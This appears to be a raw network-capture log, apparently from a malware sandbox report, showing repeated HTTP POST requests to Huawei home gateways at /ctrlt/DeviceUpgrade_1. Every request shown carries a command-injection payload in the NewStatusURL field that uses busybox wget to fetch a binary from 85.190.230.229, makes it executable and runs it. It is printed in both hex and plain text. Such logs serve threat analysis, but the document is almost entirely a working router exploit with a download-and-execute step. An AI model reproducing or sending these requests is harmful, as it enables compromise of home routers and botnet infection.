                                                                      Aug 2, 2024 13:17:06.794025898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746088982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681752920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      86192.168.2.145993641.46.200.21037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.981786013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.310086966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802170038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.794035912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746088028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681796074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617553949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.232856989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


